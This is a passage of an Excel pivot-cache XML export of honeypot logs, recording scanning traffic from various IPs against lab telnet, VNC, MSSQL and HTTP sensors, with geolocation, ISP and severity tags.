    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1841"/>
    <x v="1841"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T14:10:25"/>
    <d v="2024-07-09T00:39:00"/>
    <d v="2025-04-14T14:10:25"/>
    <n v="35"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_SSH_H39&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;40192&amp;&amp;22&amp;&amp;34063&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="South East"/>
    <s v="New Delhi (Okhla)"/>
    <s v="1261481"/>
    <s v="110020"/>
    <s v="28.5317"/>
    <s v="77.2766"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="residential"/>
    <s v="Bharti Telenet Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7ab0:71f9"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1842"/>
    <x v="1842"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T14:05:28"/>
    <d v="2025-04-14T03:58:21"/>
    <d v="2025-04-14T14:05:28"/>
    <n v="22"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H10"/>
    <s v="5900"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="AE"/>
    <s v="United Arab Emirates"/>
    <s v="DU"/>
    <s v="Dubai"/>
    <s v="NA"/>
    <s v="Dubai"/>
    <s v="292223"/>
    <s v="20040 64619"/>
    <s v="25.2048"/>
    <s v="55.2708"/>
    <s v="138915"/>
    <s v="Kaopu Cloud HK Limited"/>
    <s v="Kaopu Cloud HK Limited"/>
    <s v="hosting"/>
    <s v="LightNode-AE"/>
    <s v="1991-04-16"/>
    <s v="COGENT-A"/>
    <s v="2023-10-11"/>
    <s v="connection"/>
    <s v="{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:263c:ca63"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1843"/>
    <x v="1843"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T14:01:50"/>
    <d v="2025-04-14T14:00:45"/>
    <d v="2025-04-14T14:01:50"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="JM"/>
    <s v="Jamaica"/>
    <s v="02"/>
    <s v="Saint Andrew Parish"/>
    <s v="New Kingston"/>
    <s v="Kingston"/>
    <s v="3489854"/>
    <s v="NA"/>
    <s v="18.0073"/>
    <s v="-76.785"/>
    <s v="30689"/>
    <s v="FLOW"/>
    <s v="Columbus Networks USA"/>
    <s v="residential"/>
    <s v="Columbus Communication Jamaica Limited, Merit Communication Limited"/>
    <s v="2005-01-19"/>
    <s v="COLUMBUS-NETWORKS-3"/>
    <s v="2017-03-08"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:48fc:8893"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1844"/>
    <x v="1844"/>
    <s v="1-34-76-241.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T14:00:49"/>
    <d v="2024-05-28T00:18:52"/>
    <d v="2025-04-14T14:00:49"/>
    <n v="384"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;53&amp;&amp;7445&amp;&amp;80&amp;&amp;57019&amp;&amp;25673"/>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2010-05-05"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET: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122:4cf1"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1845"/>
    <x v="1845"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T13:55:20"/>
    <d v="2025-04-14T10:39:58"/>
    <d v="2025-04-14T13:55:20"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29"/>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business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5b:f7d2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1846"/>
    <x v="1846"/>
    <s v="122-116-98-125.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T13:51:28"/>
    <d v="2024-09-11T22:07:00"/>
    <d v="2025-04-14T13:51:28"/>
    <n v="361"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H23"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;80&amp;&amp;23&amp;&amp;33690&amp;&amp;53004&amp;&amp;9100&amp;&amp;26052&amp;&amp;52225"/>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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a74:627d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1847"/>
    <x v="1847"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T13:30:18"/>
    <d v="2025-04-14T13:26:29"/>
    <d v="2025-04-14T13:30:18"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Ratchathewi"/>
    <s v="Ratchathewi (Khwaeng Samsen Nai)"/>
    <s v="7026885"/>
    <s v="NA"/>
    <s v="13.7683"/>
    <s v="100.54"/>
    <s v="133481"/>
    <s v="ADVANCED WIRELESS NETWORK COMPANY LIMITED"/>
    <s v="AIS-Fibre"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2010-10-26"/>
    <s v="TH-AIS-Fibre"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3100:42c7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1848"/>
    <x v="1848"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T13:26:03"/>
    <d v="2025-04-14T13:26:03"/>
    <d v="2025-04-14T13:26:03"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b59:14bb"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1849"/>
    <x v="1849"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T13:25:44"/>
    <d v="2025-04-14T13:25:44"/>
    <d v="2025-04-14T13:25:44"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:744b:d444"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1850"/>
    <x v="1850"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T12:56:54"/>
    <d v="2025-04-14T12:54:12"/>
    <d v="2025-04-14T12:56:54"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Pune"/>
    <s v="Pune"/>
    <s v="1259229"/>
    <s v="411001"/>
    <s v="18.5204"/>
    <s v="73.8567"/>
    <s v="138278"/>
    <s v="Nikita Broadband Pvt. Ltd."/>
    <s v="Nikita Broadband Pvt. Ltd"/>
    <s v="residential"/>
    <s v="Nikita Broadband Pvt. Ltd."/>
    <s v="None"/>
    <s v="NIKITABR"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6785:7e49"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1851"/>
    <x v="1851"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T12:56:30"/>
    <d v="2025-04-14T12:56:30"/>
    <d v="2025-04-14T12:56:30"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5d:eb45"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1852"/>
    <x v="1852"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T12:48:46"/>
    <d v="2025-04-06T13:24:46"/>
    <d v="2025-04-14T12:48:46"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="31"/>
    <s v="Ulsan"/>
    <s v="Jung-gu"/>
    <s v="Bangu-dong"/>
    <s v="8691893"/>
    <s v="681260"/>
    <s v="35.557"/>
    <s v="129.344"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7992:1f8d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1853"/>
    <x v="1853"/>
    <s v="NA&amp;&amp;175.59.151.193.it-tv.org"/>
    <x v="0"/>
    <d v="2025-04-14T12:30:04"/>
    <d v="2025-04-14T12:20:44"/>
    <d v="2025-04-14T12:30:04"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Darnytsia"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4018"/>
    <s v="30.6498"/>
    <s v="31350"/>
    <s v="Private enterprise ITM"/>
    <s v="Private enterprise ITM"/>
    <s v="business"/>
    <s v="End"/>
    <s v="2004-04-21"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c197:3baf"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1854"/>
    <x v="1854"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T12:29:07"/>
    <d v="2025-03-28T09:47:38"/>
    <d v="2025-04-14T12:29:07"/>
    <n v="196"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Guri-si"/>
    <s v="Guri-si (Sutaek-dong)"/>
    <s v="1841988"/>
    <s v="NA"/>
    <s v="37.5946"/>
    <s v="127.149"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7621:af9f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1855"/>
    <x v="1855"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T11:22:11"/>
    <d v="2024-07-07T12:34:00"/>
    <d v="2025-04-14T11:22:11"/>
    <n v="315"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H3&amp;&amp;SMA-LAB_SSH_H33&amp;&amp;SMA-LAB_IPP_H8&amp;&amp;SMA-LAB_SMB_H15&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_HTTP_H28&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_SSH_H22&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_FTP_H10&amp;&amp;SMA-LAB_LDAP_H18&amp;&amp;SMA-LAB_SIP_H23&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_SOCKS5_H47&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_SNMP_H41&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_SMB_H9&amp;&amp;SMA-LAB_REDIS_H19&amp;&amp;SMA-LAB_SNMP_H13&amp;&amp;SMA-LAB_IMAP_H7&amp;&amp;SMA-LAB_ORACLE_H14&amp;&amp;SMA-LAB_LDAP_H4&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_SOCKS5_H34&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_SNMP_H17&amp;&amp;SMA-LAB_IMAP_H6&amp;&amp;SMA-LAB_FTP_H24&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_IRC_H35&amp;&amp;SMA-LAB_SNMP_H8&amp;&amp;SMA-LAB_IMAP_H2&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_SNMP_H15&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_LDAP_H8&amp;&amp;SMA-LAB_IMAP_H45&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_POP3_H40&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_FTP_H8&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_MYSQL_H39&amp;&amp;SMA-LAB_SNMP_H47&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_ORACLE_H22&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_NTP_H11&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_SNMP_H2&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_ORACLE_H8&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_SNMP_H40&a